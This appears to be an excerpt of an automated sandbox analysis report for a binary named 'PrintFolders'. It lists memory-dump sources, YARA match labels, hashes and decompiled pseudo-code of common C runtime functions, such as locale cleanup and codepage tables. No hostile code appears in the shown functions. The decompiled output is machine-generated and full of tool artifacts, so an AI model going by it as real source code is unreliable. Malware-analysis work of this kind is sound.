0x0040f9c3
0x0040f817
0x0040f81d
0x0040f822
0x0040f826
0x0040f82a
0x0040f82b
0x0040f82d
0x0040f830
0x0040f835
0x0040f83e
0x0040f84f
0x0040f85a
0x0040f860
0x0040f861
0x0040f866
0x0040f869
0x0040f86e
0x0040f876
0x0040f879
0x0040f87c
0x0040f8c1
0x0040f8c1
0x0040f8c7
0x0040f8c7
0x0040f8cc
0x0040f8cd
0x0040f8d3
0x0040f904
0x0040f8d5
0x0040f8d7
0x0040f8d8
0x0040f8dd
0x0040f8e0
0x0040f8e2
0x0040f8e5
0x0040f8e8
0x0040f8eb
0x0040f8ee
0x0040f8f7
0x0040f8fc
0x0040f8fc
0x0040f8f7
0x0040f907
0x0040f90c
0x0040f90f
0x0040f919
0x0040f924
0x0040f92a
0x0040f92d
0x0040f937
0x0040f942
0x0040f94e
0x0040f951
0x0040f954
0x0040f95f
0x0040f964
0x0040f966
0x0040f96b
0x0040f96e
0x0040f978
0x0040f980
0x0040f985
0x0040f98f
0x0040f99d
0x0040f9b0
0x0040f9b7
0x0040f9b7
0x0040f99d
0x0040f980
0x0040f964
0x0040f942
0x00000000
0x0040f9bf
0x0040f881
0x0040f88b
0x0040f8b0
0x0040f8b6
0x0040f8b9
0x00000000
0x00000000
0x00000000
0x00000000

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0040F809

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: af8edf595f28d6e0de3f7c832e975c9ce316b7f81847fa13e3e8cff5d50537ce
Instruction ID: 442fd19c12fe52d52473a448f085702681ee7344cd8d47f004f5f7bce1392ef5
Opcode Fuzzy Hash: af8edf595f28d6e0de3f7c832e975c9ce316b7f81847fa13e3e8cff5d50537ce
Instruction Fuzzy Hash: 825159B2A102199BEB29CF59D9857AABBF0FB48314F14843BD405EB791E378D904CF58

Uniqueness

Uniqueness Score: -1.00%

Function 100091C7 Relevance: .0, Instructions: 22
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E100091C7(void* __ecx) {
				char _v8;
				intOrPtr _t7;
				char _t13;

				_t13 = 0;
				_v8 = 0;
				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t16 =  *((intOrPtr*)(_t7 + 8));
				if( *((intOrPtr*)(_t7 + 8)) < 0) {
					L2:
					_t13 = 1;
				} else {
					E10008159(_t16,  &_v8);
					if(_v8 != 1) {
						goto L2;
					}
				}
				return _t13;
			}

0x100091d4
0x100091d6
0x100091d9
0x100091dc
0x100091df
0x100091f0
0x100091f2
0x100091e1
0x100091e5
0x100091ee
0x00000000
0x00000000
0x100091ee
0x100091f7

Memory Dump Source

Source File: 00000002.00000002.326460873.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.326456208.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326476703.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326484657.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326522758.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_PrintFolders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5142b2ecf730a3c36b94ed0dd87861f2f8d441af9f974cc276bfbc499525e151
Instruction ID: 28c602149d0e72d51d161a6ecb967c1a520d45018b1f8e98f239418fe4463083
Opcode Fuzzy Hash: 5142b2ecf730a3c36b94ed0dd87861f2f8d441af9f974cc276bfbc499525e151
Instruction Fuzzy Hash: 5AE0EC72A11228EBCB15DB98D95498AB7ECFB49B90B1545AAB511D3215C270DE01C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 0042041F Relevance: .0, Instructions: 22
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0042041F(void* __ecx) {
				char _v8;
				intOrPtr _t7;
				char _t13;

				_t13 = 0;
				_v8 = 0;
				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t16 =  *((intOrPtr*)(_t7 + 8));
				if( *((intOrPtr*)(_t7 + 8)) < 0) {
					L2:
					_t13 = 1;
				} else {
					E0041E612(_t16,  &_v8);
					if(_v8 != 1) {
						goto L2;
					}
				}
				return _t13;
			}

0x0042042c
0x0042042e
0x00420431
0x00420434
0x00420437
0x00420448
0x0042044a
0x00420439
0x0042043d
0x00420446
0x00000000
0x00000000
0x00420446
0x0042044f

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fc7f42db509279383e3cc01eb7112f14e58f64f47ca781cad5004ddb32a561f
Instruction ID: 190f8b4917172ce852a4c6c2ee3eb9eeabb4d9f649594b05df5e9f634885cc74
Opcode Fuzzy Hash: 7fc7f42db509279383e3cc01eb7112f14e58f64f47ca781cad5004ddb32a561f
Instruction Fuzzy Hash: 92E08C72A11278EBCB15EB89D90498AF3FCEB45B18B95449BBA05D3201C278DE40DBE4

Uniqueness

Uniqueness Score: -1.00%

Function 004429E7 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ca6e8abd497ec3a1c156abf087cd513271e0a7e0f941d3f632673506c1267ca
Instruction ID: c2f19552910a0c3bc7347bbf13de0f87239dfd182ffd37263a02f476a58fa8e8
Opcode Fuzzy Hash: 2ca6e8abd497ec3a1c156abf087cd513271e0a7e0f941d3f632673506c1267ca
Instruction Fuzzy Hash: 3AE08C72911238EBCB24DF89DA0499AF3ECEB44B55B51449BF901F3200C6B4DE00C7E4

Uniqueness

Uniqueness Score: -1.00%

Function 0044028F Relevance: .0, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2bf1e3dbd56a5e62411fbd5e71e5e7a82189cacba0b21ec395735c552563347
Instruction ID: 16c2de7a8d20c9c44f0cfcec9700f4c07f8ea1dcaa74a4bc5a03d74aca8627af
Opcode Fuzzy Hash: b2bf1e3dbd56a5e62411fbd5e71e5e7a82189cacba0b21ec395735c552563347
Instruction Fuzzy Hash: 22E04F31000108EBDF216F94CE8DA493B29FB40345F000469FE04AA671CB79DC91DA48

Uniqueness

Uniqueness Score: -1.00%

Function 00419040 Relevance: 22.9, APIs: 15, Instructions: 357
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00419040(void* __edx, intOrPtr* _a4) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				intOrPtr* _v56;
				signed int _v60;
				signed int _v64;
				signed int* _v68;
				intOrPtr _v72;
				signed int* _v76;
				signed int** _v80;
				signed int** _v84;
				void* _v88;
				char _v92;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t126;
				signed int* _t129;
				intOrPtr* _t131;
				signed int* _t147;
				signed short _t150;
				signed int _t151;
				void* _t153;
				void* _t156;
				void* _t159;
				void* _t160;
				void* _t164;
				signed int _t165;
				signed int* _t166;
				signed char _t183;
				signed int* _t186;
				void* _t190;
				char _t195;
				signed char _t197;
				void* _t204;
				signed int* _t205;
				void* _t207;
				signed int* _t209;
				void* _t212;
				intOrPtr _t213;
				intOrPtr _t217;
				signed int* _t221;
				intOrPtr _t222;
				signed int _t223;
				void* _t227;
				signed int _t230;
				char* _t231;
				intOrPtr _t232;
				signed int* _t235;
				signed char* _t236;
				signed int** _t239;
				signed int** _t240;
				signed char* _t249;
				void* _t251;
				intOrPtr* _t252;
				void* _t255;
				signed int _t256;
				short* _t257;
				signed int _t260;
				signed int _t261;
				void* _t262;
				void* _t263;

				_t233 = __edx;
				_t126 =  *0x43d054; // 0x7bd02ead
				_v8 = _t126 ^ _t261;
				_t252 = _a4;
				_t205 = 0;
				_v56 = _t252;
				_t237 = 0;
				_v32 = 0;
				_t213 =  *((intOrPtr*)(_t252 + 0xa8));
				_v36 = 0;
				_v40 = 0;
				_v92 = _t252;
				_v88 = 0;
				if(_t213 == 0) {
					__eflags =  *(_t252 + 0x8c);
					if( *(_t252 + 0x8c) != 0) {
						asm("lock dec dword [eax]");
					}
					 *(_t252 + 0x8c) = _t205;
					_t129 = 0;
					__eflags = 0;
					 *(_t252 + 0x90) = _t205;
					 *_t252 = 0x430310;
					 *(_t252 + 0x94) = 0x430590;
					 *(_t252 + 0x98) = 0x430710;
					 *(_t252 + 4) = 1;
					L48:
					return E0040EBBF(_t129, _t205, _v8 ^ _t261, _t233, _t237, _t252);
				}
				_t131 = _t252 + 8;
				_v52 = 0;
				if( *_t131 != 0) {
					L3:
					_v52 = E0041E25B(1, 4);
					E0041E2B8(_t205);
					_v32 = E0041E25B(0x180, 2);
					E0041E2B8(_t205);
					_t237 = E0041E25B(0x180, 1);
					_v44 = _t237;
					E0041E2B8(_t205);
					_v36 = E0041E25B(0x180, 1);
					E0041E2B8(_t205);
					_v40 = E0041E25B(0x101, 1);
					E0041E2B8(_t205);
					_t263 = _t262 + 0x3c;
					if(_v52 == _t205 || _v32 == _t205) {
						L43:
						E0041E2B8(_v52);
						E0041E2B8(_v32);
						E0041E2B8(_t237);
						E0041E2B8(_v36);
						_t205 = 1;
						__eflags = 1;
						goto L44;
					} else {
						_t217 = _v40;
						if(_t217 == 0 || _t237 == 0 || _v36 == _t205) {
							goto L43;
						} else {
							_t147 = _t205;
							do {
								 *(_t147 + _t217) = _t147;
								_t147 =  &(_t147[0]);
							} while (_t147 < 0x100);
							if(GetCPInfo( *(_t252 + 8),  &_v28) == 0) {
								goto L43;
							}
							_t150 = _v28;
							if(_t150 > 5) {
								goto L43;
							}
							_t151 = _t150 & 0x0000ffff;
							_v60 = _t151;
							if(_t151 <= 1) {
								L22:
								_t37 = _t237 + 0x81; // 0x81
								_t233 = 0xff;
								_v48 = _v40 + 1;
								_t153 = E004213EC(_t281, _t205,  *((intOrPtr*)(_t252 + 0xa8)), 0x100, _v40 + 1, 0xff, _t37, 0xff,  *(_t252 + 8), _t205);
								_t263 = _t263 + 0x24;
								_t282 = _t153;
								if(_t153 == 0) {
									goto L43;
								}
								_t156 = E004213EC(_t282, _t205,  *((intOrPtr*)(_t252 + 0xa8)), 0x200, _v48, 0xff, _v36 + 0x81, 0xff,  *(_t252 + 8), _t205);
								_t263 = _t263 + 0x24;
								_t283 = _t156;
								if(_t156 == 0) {
									goto L43;
								}
								_v72 = _v32 + 0x100;
								_t159 = E00421875(_t283, _t205, 1, _v40, 0x100, _v32 + 0x100,  *(_t252 + 8), _t205);
								_t263 = _t263 + 0x1c;
								if(_t159 == 0) {
									goto L43;
								}
								_t160 = _v32;
								_t221 = _t160 + 0xfe;
								 *_t221 = 0;
								_t233 = _v44;
								_v76 = _t221;
								_t222 = _v36;
								_t239 = _t233 + 0x80;
								 *(_t233 + 0x7f) = _t205;
								_v80 = _t239;
								 *(_t222 + 0x7f) = _t205;
								 *_t239 = _t205;
								_t240 = _t222 + 0x80;
								_v84 = _t240;
								 *_t240 = _t205;
								if(_v60 <= 1) {
									L39:
									_t223 = 0x3f;
									_push(0x1f);
									memcpy(_v32, _v32 + 0x200, _t223 << 2);
									asm("movsw");
									_t164 = memcpy(_t233, _t233 + 0x100, 0 << 2);
									_t227 = 0x1f;
									asm("movsw");
									asm("movsb");
									_t255 = _t164 + 0x100;
									_t165 = memcpy(_t164, _t255, 0 << 2);
									_t237 = _t255 + _t227 + _t227;
									asm("movsw");
									asm("movsb");
									_t252 = _v56;
									if( *(_t252 + 0x8c) != 0) {
										asm("lock xadd [ecx], eax");
										if((_t165 | 0xffffffff) == 0) {
											E0041E2B8( *(_t252 + 0x90) - 0xfe);
											_t237 = 0x80;
											E0041E2B8( *(_t252 + 0x94) - 0x80);
											E0041E2B8( *(_t252 + 0x98) - 0x80);
											E0041E2B8( *(_t252 + 0x8c));
										}
									}
									_t166 = _v52;
									 *_t166 = 1;
									 *(_t252 + 0x8c) = _t166;
									 *_t252 = _v72;
									 *(_t252 + 0x90) = _v76;
									 *(_t252 + 0x94) = _v80;
									 *(_t252 + 0x98) = _v84;
									 *(_t252 + 4) = _v60;
									L44:
									E0041E2B8(_v40);
									_t129 = _t205;
									goto L48;
								}
								if( *(_t252 + 8) != 0xfde9) {
									_t249 =  &_v22;
									__eflags = _v22 - _t205;
									if(_v22 == _t205) {
										goto L39;
									}
									_t207 = _v32;
									while(1) {
										_t183 = _t249[1];
										__eflags = _t183;
										if(_t183 == 0) {
											break;
										}
										_t256 =  *_t249 & 0x000000ff;
										_v64 = _t256;
										__eflags = _t256 - (_t183 & 0x000000ff);
										if(_t256 > (_t183 & 0x000000ff)) {
											L37:
											_t249 =  &(_t249[2]);
											__eflags =  *_t249;
											if( *_t249 != 0) {
												continue;
											}
											break;
										}
										_v48 = _t233;
										_t186 = _t222 + 0x80 + _t256;
										_t235 = _t233 - _t222;
										__eflags = _t235;
										_t230 = _v64;
										_t257 = _t207 - 0xffffff00 + _t256 * 2;
										_v68 = _t186;
										_t209 = _t186;
										do {
											 *_t257 = 0x8000;
											_t257 = _t257 + 2;
											 *(_t235 + _t209) = _t230;
											 *_t209 = _t230;
											_t230 = _t230 + 1;
											_t209 =  &(_t209[0]);
											__eflags = _t230 - (_t249[1] & 0x000000ff);
										} while (_t230 <= (_t249[1] & 0x000000ff));
										_t233 = _v44;
										_t222 = _v36;
										_t207 = _v32;
										goto L37;
									}
									L38:
									_t205 = 0;
									goto L39;
								}
								_v44 = _t160 + 0x200;
								_t231 = _t233 + 0x100;
								_t251 = _t222 - _t233;
								_t190 = 0xffffff80;
								_v48 = _t190 - _t233;
								do {
									_push(0x32);
									asm("sbb eax, eax");
									_v44 = _v44 + 2;
									 *_v44 = (0xfffffebe + _t231 & 0xffff8000) + 0x8000;
									_t212 = _v48;
									_t195 = _t231 + _t212;
									 *_t231 = _t195;
									 *((char*)(_t251 + _t231)) = _t195;
									_t231 = _t231 + 1;
								} while (_t212 + _t231 <= 0xff);
								goto L38;
							}
							_t281 =  *(_t252 + 8) - 0xfde9;
							if( *(_t252 + 8) != 0xfde9) {
								_t236 =  &_v22;
								__eflags = _v22 - _t205;
								if(__eflags == 0) {
									goto L22;
								}
								_t232 = _v40;
								while(1) {
									_t197 = _t236[1];
									__eflags = _t197;
									if(__eflags == 0) {
										break;
									}
									_t260 =  *_t236 & 0x000000ff;
									__eflags = _t260 - (_t197 & 0x000000ff);
									if(_t260 > (_t197 & 0x000000ff)) {
										L20:
										_t236 =  &(_t236[2]);
										__eflags =  *_t236 - _t205;
										if(__eflags != 0) {
											continue;
										}
										break;
									} else {
										goto L19;
									}
									do {
										L19:
										 *((char*)(_t260 + _t232)) = 0x20;
										_t260 = _t260 + 1;
										__eflags = _t260 - (_t236[1] & 0x000000ff);
									} while (_t260 <= (_t236[1] & 0x000000ff));
									goto L20;
								}
								_t252 = _v56;
								goto L22;
							}
							E00410B00(_t237, _v40 - 0xffffff80, 0x20, 0x80);
							_t263 = _t263 + 0xc;
							goto L22;
						}
					}
				}
				_push(_t131);
				_push(0x1004);
				_push(_t213);
				_push(0);
				_push( &_v92);
				_t204 = E004216C5(__edx);
				_t263 = _t262 + 0x14;
				if(_t204 != 0) {
					goto L43;
				}
				goto L3;
			}

0x00419040
0x00419048
0x0041904f
0x00419054
0x00419057
0x0041905a
0x0041905d
0x0041905f
0x00419062
0x00419068
0x0041906b
0x0041906e
0x00419071
0x00419076
0x00419459
0x0041945b
0x0041945d
0x0041945d
0x00419460
0x00419466
0x00419466
0x00419468
0x0041946e
0x00419474
0x0041947e
0x00419488
0x0041948f
0x0041949d
0x0041949d
0x0041907c
0x0041907f
0x00419084
0x004190a2
0x004190ac
0x004190af
0x004190c2
0x004190c5
0x004190d2
0x004190d5
0x004190d8
0x004190ea
0x004190ed
0x004190ff
0x00419102
0x00419107
0x0041910d
0x00419422
0x00419425
0x0041942d
0x00419433
0x0041943b
0x00419445
0x00419445
0x00000000
0x0041911c
0x0041911c
0x00419121
0x00000000
0x00419138
0x00419138
0x0041913a
0x0041913a
0x0041913d
0x0041913e
0x00419154
0x00000000
0x00000000
0x0041915a
0x00419160
0x00000000
0x00000000
0x00419166
0x00419169
0x0041916f
0x004191c5
0x004191c8
0x004191d2
0x004191e7
0x004191eb
0x004191f0
0x004191f3
0x004191f5
0x00000000
0x00000000
0x0041921e
0x00419223
0x00419226
0x00419228
0x00000000
0x00000000
0x00419243
0x00419249
0x0041924e
0x00419253
0x00000000
0x00000000
0x00419259
0x00419262
0x00419268
0x0041926b
0x0041926e
0x00419271
0x00419274
0x0041927a
0x0041927d
0x00419280
0x00419283
0x00419285
0x0041928b
0x0041928e
0x00419290
0x00419360
0x00419367
0x00419368
0x00419373
0x00419378
0x00419382
0x00419384
0x00419385
0x00419387
0x00419388
0x00419390
0x00419390
0x00419392
0x00419394
0x00419395
0x004193a0
0x004193a5
0x004193a9
0x004193b7
0x004193c2
0x004193ca
0x004193d8
0x004193e3
0x004193e8
0x004193a9
0x004193eb
0x004193ee
0x004193f4
0x004193fd
0x00419402
0x0041940b
0x00419414
0x0041941d
0x00419446
0x00419449
0x0041944f
0x00000000
0x0041944f
0x0041929d
0x004192f6
0x004192f9
0x004192fc
0x00000000
0x00000000
0x004192fe
0x00419301
0x00419301
0x00419304
0x00419306
0x00000000
0x00000000
0x00419308
0x0041930e
0x00419311
0x00419313
0x00419356
0x00419356
0x00419359
0x0041935c
0x00000000
0x00000000
0x00000000
0x0041935c
0x0041931b
0x00419324
0x00419326
0x00419326
0x00419328
0x0041932b
0x0041932e
0x00419331
0x00419333
0x00419338
0x0041933b
0x0041933e
0x00419341
0x00419343
0x00419348
0x00419349
0x00419349
0x0041934d
0x00419350
0x00419353
0x00000000
0x00419353
0x0041935e
0x0041935e
0x00000000
0x0041935e
0x004192a6
0x004192a9
0x004192b6
0x004192b8
0x004192bd
0x004192c0
0x004192c3
0x004192cb
0x004192cd
0x004192db
0x004192de
0x004192e1
0x004192e4
0x004192e6
0x004192e9
0x004192ed
0x00000000
0x004192f4
0x00419171
0x00419178
0x00419192
0x00419195
0x00419198
0x00000000
0x00000000
0x0041919a
0x0041919d
0x0041919d
0x004191a0
0x004191a2
0x00000000
0x00000000
0x004191a4
0x004191aa
0x004191ac
0x004191bb
0x004191bb
0x004191be
0x004191c0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004191ae
0x004191ae
0x004191ae
0x004191b2
0x004191b7
0x004191b7
0x00000000
0x004191ae
0x004191c2
0x00000000
0x004191c2
0x00419188
0x0041918d
0x00000000
0x0041918d
0x00419121
0x0041910d
0x00419086
0x00419087
0x0041908c
0x00419090
0x00419091
0x00419092
0x00419097
0x0041909c
0x00000000
0x00000000
0x00000000

APIs

_free.LIBCMT ref: 004190AF
_free.LIBCMT ref: 004190C5
_free.LIBCMT ref: 004190D8
_free.LIBCMT ref: 004190ED
_free.LIBCMT ref: 00419102
GetCPInfo.KERNEL32(?,?), ref: 0041914C

Part of subcall function 004216C5: _free.LIBCMT ref: 00421730

_free.LIBCMT ref: 004193B7
_free.LIBCMT ref: 004193CA
_free.LIBCMT ref: 004193D8
_free.LIBCMT ref: 004193E3
_free.LIBCMT ref: 00419425
_free.LIBCMT ref: 0041942D
_free.LIBCMT ref: 00419433
_free.LIBCMT ref: 0041943B
_free.LIBCMT ref: 00419449

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: c55eede84f28e057531605bdedab24d4a33e5c8ac86e8fc84041852ef0a9f38b
Instruction ID: b3dde5999e6bd8c58c9687087de5c6fa98508f20abd658152064e8f8f6389a2c
Opcode Fuzzy Hash: c55eede84f28e057531605bdedab24d4a33e5c8ac86e8fc84041852ef0a9f38b
Instruction Fuzzy Hash: 4FD1A0719002059FEB15CFA5C891BEEB7F5BF08304F14456EE899A7382D778AC85CB54

Uniqueness

Uniqueness Score: -1.00%

Function 1000AEB3 Relevance: 19.6, APIs: 13, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1000AEB3(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x100176f8) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E10008701(_t46);
							E1000B99D( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E10008701(_t47);
							E1000BA9B( *((intOrPtr*)(_t74 + 0x88)));
						}
						E10008701( *((intOrPtr*)(_t74 + 0x7c)));
						E10008701( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E10008701( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E10008701( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E10008701( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E10008701( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E1000B024( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x100171c8) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E10008701(_t31);
							E10008701( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E10008701(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E10008701(_t74);
			}

0x1000aebb
0x1000aebf
0x1000aec7
0x1000aed0
0x1000aed5
0x1000aedc
0x1000aee4
0x1000aeec
0x1000aef7
0x1000aefd
0x1000aefe
0x1000af06
0x1000af0e
0x1000af19
0x1000af1f
0x1000af23
0x1000af2e
0x1000af34
0x1000aed5
0x1000af35
0x1000af3d
0x1000af50
0x1000af63
0x1000af71
0x1000af7c
0x1000af81
0x1000af8a
0x1000af92
0x1000af93
0x1000af99
0x1000af9c
0x1000af9f
0x1000afa6
0x1000afa8
0x1000afac
0x1000afb4
0x1000afbb
0x1000afc1
0x1000afc2
0x1000afc2
0x1000afc9
0x1000afcb
0x1000afd0
0x1000afd8
0x1000afdd
0x1000afde
0x1000afde
0x1000afe1
0x1000afe4
0x1000afe7
0x1000afea
0x1000afea
0x1000affa

APIs

___free_lconv_mon.LIBCMT ref: 1000AEF7

Part of subcall function 1000B99D: _free.LIBCMT ref: 1000B9BA
Part of subcall function 1000B99D: _free.LIBCMT ref: 1000B9CC
Part of subcall function 1000B99D: _free.LIBCMT ref: 1000B9DE
Part of subcall function 1000B99D: _free.LIBCMT ref: 1000B9F0
Part of subcall function 1000B99D: _free.LIBCMT ref: 1000BA02
Part of subcall function 1000B99D: _free.LIBCMT ref: 1000BA14
Part of subcall function 1000B99D: _free.LIBCMT ref: 1000BA26
Part of subcall function 1000B99D: _free.LIBCMT ref: 1000BA38
Part of subcall function 1000B99D: _free.LIBCMT ref: 1000BA4A
Part of subcall function 1000B99D: _free.LIBCMT ref: 1000BA5C
Part of subcall function 1000B99D: _free.LIBCMT ref: 1000BA6E
Part of subcall function 1000B99D: _free.LIBCMT ref: 1000BA80
Part of subcall function 1000B99D: _free.LIBCMT ref: 1000BA92

_free.LIBCMT ref: 1000AEEC

Part of subcall function 10008701: RtlFreeHeap.NTDLL(00000000,00000000,?,100074AC), ref: 10008717
Part of subcall function 10008701: GetLastError.KERNEL32(?,?,100074AC), ref: 10008729

_free.LIBCMT ref: 1000AF0E
_free.LIBCMT ref: 1000AF23
_free.LIBCMT ref: 1000AF2E
_free.LIBCMT ref: 1000AF50
_free.LIBCMT ref: 1000AF63
_free.LIBCMT ref: 1000AF71
_free.LIBCMT ref: 1000AF7C
_free.LIBCMT ref: 1000AFB4
_free.LIBCMT ref: 1000AFBB
_free.LIBCMT ref: 1000AFD8
_free.LIBCMT ref: 1000AFF0

Memory Dump Source

Source File: 00000002.00000002.326460873.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.326456208.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326476703.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326484657.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326522758.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_PrintFolders.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: c4e98949ab35aafe9e56d21f341b4b46aaaa1c26fbfc12bf4678de360067af1f
Instruction ID: 98d3de5cb3a98999ebd56d36befb0731ec5fbc7688b04e9877a88235aa96296e
Opcode Fuzzy Hash: c4e98949ab35aafe9e56d21f341b4b46aaaa1c26fbfc12bf4678de360067af1f
Instruction Fuzzy Hash: 0A3157726046069FFB21DAB9D881B6A73E9FF013D0F614529E099D6199DE35FE808B20

Uniqueness

Uniqueness Score: -1.00%

Function 0044334A Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00443383
___free_lconv_mon.LIBCMT ref: 0044338E

Part of subcall function 00442EB5: _free.LIBCMT ref: 00442ED2
Part of subcall function 00442EB5: _free.LIBCMT ref: 00442EE4
Part of subcall function 00442EB5: _free.LIBCMT ref: 00442EF6
Part of subcall function 00442EB5: _free.LIBCMT ref: 00442F08
Part of subcall function 00442EB5: _free.LIBCMT ref: 00442F1A
Part of subcall function 00442EB5: _free.LIBCMT ref: 00442F2C
Part of subcall function 00442EB5: _free.LIBCMT ref: 00442F3E
Part of subcall function 00442EB5: _free.LIBCMT ref: 00442F50
Part of subcall function 00442EB5: _free.LIBCMT ref: 00442F62
Part of subcall function 00442EB5: _free.LIBCMT ref: 00442F74
Part of subcall function 00442EB5: _free.LIBCMT ref: 00442F86
Part of subcall function 00442EB5: _free.LIBCMT ref: 00442F98
Part of subcall function 00442EB5: _free.LIBCMT ref: 00442FAA

_free.LIBCMT ref: 004433A5
_free.LIBCMT ref: 004433BA
_free.LIBCMT ref: 004433C5
_free.LIBCMT ref: 004433E7
_free.LIBCMT ref: 004433FA
_free.LIBCMT ref: 00443408
_free.LIBCMT ref: 00443413
_free.LIBCMT ref: 0044344B
_free.LIBCMT ref: 00443452
_free.LIBCMT ref: 0044346F
_free.LIBCMT ref: 00443487

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: _free$___free_lconv_mon
String ID:
API String ID: 3658870901-0
Opcode ID: a944ca6634b5d74932c30d559000e04cde607573212888ef64c986212d955d2d
